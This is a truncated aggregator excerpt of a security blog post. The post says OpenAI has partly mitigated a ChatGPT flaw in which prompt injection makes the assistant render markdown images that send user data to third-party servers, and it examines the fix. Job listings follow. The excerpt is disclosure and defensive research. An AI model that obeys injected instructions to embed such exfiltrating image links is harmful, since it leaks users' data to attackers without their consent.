e
Dec. 20, 2023, 10:35 a.m. |

Embrace The Red embracethered.com

OpenAI seems to have implemented a first mitigation for a well-known data exfiltration vulnerability in ChatGPT. Attackers can use image markdown rendering during Prompt Injection to send data to third party servers without the users' consent.
The fix is not perfect but a step into the right direction. In this post I share what I figured out so far about the fix after looking at it briefly this morning.
Background Yesterday I was doing a live demo of the data …

attackers chatgpt consent data data exfiltration data leak exfiltration fix image injection leak mitigation openai party perfect prompt prompt injection send servers share third vulnerability well-known

Social Engineer For Reverse Engineering Exploit Study

@ Independent study | Remote

Application Security Engineer - Remote Friendly

@ Unit21 | San Francisco,CA; New York City; Remote USA;

Cloud Security Specialist

@ AppsFlyer | Herzliya

Malware Analysis Engineer - Canberra, Australia

@ Apple | Canberra, Australian Capital Territory, Australia

Product CISO

@ Fortinet | Sunnyvale, CA, United States

Manager, Security Engineering

@ Thrive | United States - Remote